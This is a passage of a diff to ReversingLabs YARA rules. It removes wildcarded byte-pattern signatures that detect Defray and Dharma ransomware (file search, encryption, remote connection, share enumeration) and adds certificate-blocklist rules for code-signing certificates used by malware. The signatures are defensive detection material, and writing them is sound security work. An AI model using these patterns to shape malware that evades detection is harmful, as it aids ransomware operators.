-            8D 84 24 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 57 E8 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $search_files_1 and $encrypt_files_1 and $kill_specific_processes_1 ) or ( $search_files_1 and $encrypt_files_2 and $kill_specific_processes_2 ) or ( $search_files_2 and $encrypt_files_3 and $kill_specific_processes_3 ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "42:80:f2:c8:ce:1d:98:e5:f8:da:7e:cb:00:5e:ea:e5" and 1476316800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Defray : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2946397Be9C5Ae44E95C99Af : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Defray ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bc9e2dfe-168b-5b99-8523-07bfdcba44f2"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "46bc3ade-544c-5ee1-8d5d-4b8a269120c9"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Defray.yara#L1-L157"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16654-L16670"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "82d883c77f49e50edbc7af05a108d4d54a46dca7661e4d0cd8aeffa19cb8df98"
+		logic_hash = "b7b4925482fcc47dea81eb3d84af31cc572f1b19080b98dda330b0bf6d7c80f4"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Defray"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? ?? ?? ?? 33
-            F6 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B D9 56 50 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83
-            C4 ?? 2B D3 8B CB 89 95 ?? ?? ?? ?? 0F B7 01 66 89 04 0A 8D 49 ?? 66 85 C0 75 ?? 8D
-            BD ?? ?? ?? ?? 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C6 75 ?? BE ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 53 A5 A5 66 A5 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 33 F6 8B 1D ?? ?? ?? ??
-            83 FB ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ??
-            66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 8B C6
-            EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B
-            10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66
-            85 D2 75 ?? 8B C6 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B
-            95 ?? ?? ?? ?? 0F B7 01 66 89 04 0A 8D 49 ?? 66 85 C0 75 ?? 8D BD ?? ?? ?? ?? 83 EF
-            ?? 33 C9 66 8B 47 ?? 8D 7F ?? 66 3B C1 75 ?? A1 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 89 07
-            8B F2 66 8B 02 83 C2 ?? 66 3B C1 75 ?? 8D BD ?? ?? ?? ?? 2B D6 83 EF ?? 66 8B 47 ??
-            83 C7 ?? 66 3B C1 75 ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F6 85 ?? ?? ?? ?? ?? F3
-            A4 74 ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? F7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? 75 ?? 8B 8D ?? ?? ?? ?? 66 8B 85 ?? ?? ?? ?? 66 89 04 59 43 89 1D ?? ??
-            ?? ?? 33 F6 8B 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85
-            ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_special_folders = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 BE ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 56 33 DB 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 56 53 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 56 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ??
-            ?? ?? BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 6A ?? 59 68 ?? ?? ?? ?? 53 F3 A5 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D BD ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 59 F3 A5 68
-            ?? ?? ?? ?? 53 50 66 A5 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D
-            BD ?? ?? ?? ?? 6A ?? 59 68 ?? ?? ?? ?? 53 F3 A5 50 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 83 C4 ?? 53 6A ?? 50 53 FF D6 53 6A ?? 8D 85 ?? ?? ?? ?? 50 53 FF
-            D6 53 6A ?? 8D 85 ?? ?? ?? ?? 50 53 FF D6 8D BD ?? ?? ?? ?? 83 EF ?? 66 8B 47 ?? 83
-            C7 ?? 66 3B C3 75 ?? 6A ?? 59 BE ?? ?? ?? ?? F3 A5 8D BD ?? ?? ?? ?? 83 EF ?? 66 8B
-            47 ?? 83 C7 ?? 66 3B C3 75 ?? 6A ?? 59 BE ?? ?? ?? ?? F3 A5 8D BD ?? ?? ?? ?? 83 EF
-            ?? 66 8B 47 ?? 83 C7 ?? 66 3B C3 75 ?? BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? A5 A5 A5 A5
-            66 A5 E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$remote_connection = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 89 85 ??
-            ?? ?? ?? 33 DB 8B 45 ?? 8B FA 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53
-            50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? A0 ?? ?? ?? ?? 88 45 ?? 8D 85 ??
-            ?? ?? ?? 53 53 53 53 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ??
-            85 DB 74 ?? 33 C0 50 50 6A ?? 50 50 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 8B F8 85
-            FF 74 ?? 33 C0 50 68 ?? ?? ?? ?? 50 50 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? 50
-            57 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 8B 95 ?? ?? ?? ?? 33 C9 85 D2 74 ?? 8B CA 8D
-            41 ?? 89 85 ?? ?? ?? ?? 8A 01 41 84 C0 75 ?? 2B 8D ?? ?? ?? ?? 51 52 6A ?? 6A ?? 53
-            FF 15 ?? ?? ?? ?? 53 FF D6 8B 9D ?? ?? ?? ?? 57 FF D6 53 FF D6 8B 4D ?? 5F 5E 33 CD
-            5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_1 = {
-            55 8B EC 51 51 83 4D ?? ?? 83 4D ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68
-            ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? 6A ?? 58 EB ?? 56 8D 45 ?? 50
-            57 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 75 ?? 6A ?? EB ?? 8B 75 ?? 3B C6 0F 42 F0 83 7D
-            ?? ?? 74 ?? 6A ?? 8D 45 ?? 50 56 FF 75 ?? 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? 5E
-            57 FF 15 ?? ?? ?? ?? EB ?? 57 FF 15 ?? ?? ?? ?? 3B 75 ?? 6A ?? 58 0F 45 F0 8B C6 EB
-            ?? 57 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5E 5F 8B E5 5D C2
-        }
-		$encrypt_files_2_p1 = {
-            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 33 C0 89 85 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 45 ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? 50 89 85 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 59 33 C0 8D 7D ??
-            F3 AB 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 85 C0 74 ?? FF 15 ?? ?? ?? ?? 50
-            68 ?? ?? ?? ?? 83 CE ?? EB ?? 6A ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 85
-            C0 74 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 5E 6A ?? 8B D6 59 E8 ?? ?? ?? ??
-            59 59 E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 85 F6 75 ?? 6A ?? 5E E9 ?? ?? ?? ?? 80 BD ??
-            ?? ?? ?? ?? B8 ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? 3B F0 0F 47 F0 8D 85 ?? ?? ?? ?? 50
-            56 8B C8 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 FF B5 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 8B F8 85 FF 79 ?? FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? 5A 6A ?? 59 E8 ?? ?? ??
-            ?? 59 59 BE ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ??
-            FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 5A 6A ?? 59 E8 ?? ?? ?? ?? 59 59 6A ?? E9
-            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 8D 55 ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C7 8B DF 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 74 ?? 8B
-        }
-		$encrypt_files_2_p2 = {
-            B5 ?? ?? ?? ?? 43 46 8B C3 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 75 ?? 89 B5 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 53 8B C8 E8 ?? ?? ?? ?? 33 D2 85 FF 7E ?? 8B 85 ?? ?? ?? ??
-            8A 0C 10 8B 85 ?? ?? ?? ?? 88 0C 10 42 3B D7 7C ?? 3B FB 7D ?? 8B C3 2B C7 50 8B 85
-            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 03 C7 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50
-            53 8B C8 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8B
-            95 ?? ?? ?? ?? 8D 45 ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74
-            ?? 6A ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 59 59 85 C0 75 ?? 6A ?? 33 FF 5A 8B 85 ?? ?? ?? ?? 8A 4C 3D ?? 88 0C 38
-            47 3B FA 7C ?? 8D 75 ?? 6A ?? 2B F2 5F 8B 85 ?? ?? ?? ?? 8A 0C 32 88 0C 10 42 3B D7
-            7C ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 83 EC ?? 8D
-            85 ?? ?? ?? ?? 50 51 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-        }
-		$encrypt_files_2_p3 = {
-            85 C0 79 ?? 6A ?? E9 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? BA ?? ?? ?? ?? 2B F7 8B 85 ?? ??
-            ?? ?? 8A 0C 37 88 0C 38 47 3B FA 7C ?? 8B B5 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8A 8C 02 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 88 0C 10 42 81 FA ?? ?? ?? ?? 7C ?? 83 BD ?? ?? ?? ?? ??
-            74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 75 ?? BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B C6 E9 ?? ?? ?? ?? 51 6A ?? 53 FF B5 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 8B F8 85 FF 79 ?? FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? 5A 6A ?? 59 E8
-            ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 87 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B
-            F8 85 FF 79 ?? FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? 5A 6A ?? 59 E8 ?? ?? ?? ?? 59
-            59 EB ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 01 34 85
-            ?? ?? ?? ?? FF 04 85 ?? ?? ?? ?? 33 FF 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B C7 E8 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $find_special_folders ) and ( $encrypt_files_1 ) and ( all of ( $encrypt_files_2_p* ) ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "29:46:39:7b:e9:c5:ae:44:e9:5c:99:af" and 1476092708 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Dharma : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2Df453588177Cf1C0C297Ff4 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Dharma ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8157b20b-717c-581f-83c1-5fc8d2312238"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "c3a18989-239e-56d7-b1c2-92895c02b7d8"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Dharma.yara#L1-L108"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16672-L16688"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6f33281523b462aaff68bb04f2f6869c3e6cd60cd9306ed80bb0c3e3b699f315"
+		logic_hash = "b0c82388fd87a89841d190ce4020cc5a2ea21c9d765ceca6bc25d64162479231"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Dharma"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$file_search = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
-            8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? 51 8B 55
-            ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ??
-            75 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 8B
-            4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B
-            55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D
-            ?? ?? 75 ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52
-            8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 8B 45 ?? 8B E5 5D C3
-        }
-		$file_encrypt_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 4D ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B 45 ?? 33 D2 B9 ?? ?? ?? ?? F7 F1 8B 45 ?? 2B C2 83 E8 ?? 89 45 ?? 8B
-            4D ?? 51 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ??
-            ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 05 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 83 ?? ??
-            ?? ?? 8B 4D ?? 83 E1 ?? 74 ?? 8B 55 ?? 83 E2 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 6A ??
-            6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ??
-            ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 89 55 ?? 8B 45 ?? 89 85 ?? ?? ??
-            ?? 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D
-            ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 75 ??
-            83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 4D ?? 51
-            E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 4D
-            ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B
-            55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 83 7D
-            ?? ?? 75 ?? 8B 4D ?? 3B 4D ?? 73 ?? 8B 45 ?? 33 D2 B9 ?? ?? ?? ?? F7 F1 B8 ?? ?? ??
-            ?? 2B C2 89 45 ?? 8B 4D ?? 03 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 03 45 ?? 50 8B 4D ?? 51
-        }
-		$file_encrypt_2 = {
-            8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 03 45 ?? 39 85 ?? ?? ?? ??
-            74 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ??
-            83 C4 ?? 8B 95 ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 40 ?? ?? ?? ??
-            ?? 83 7D ?? ?? 74 ?? 8B 8D ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 8B 55 ?? 52 8B 45 ?? 50
-            8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 03 55 ?? 89 55 ?? 8B 45 ?? 03 45 ?? 89
-            45 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 45
-            ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 45 ??
-            6A ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89
-            45 ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 45
-            ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 05 ?? ??
-            ?? ?? 89 45 ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0
-            ?? 89 45 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 2B 55 ?? 52 8B 45 ?? 50 8B 8D ?? ??
-            ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 2B 55 ?? 39 95 ?? ?? ?? ?? 74 ?? EB ??
-            EB ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? E9 ??
-            ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7E ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 8D ?? ??
-            ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ??
-            8B 55 ?? 52 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7E ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ??
-            ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$enum_shares = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ??
-            50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 E8 ??
-            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45
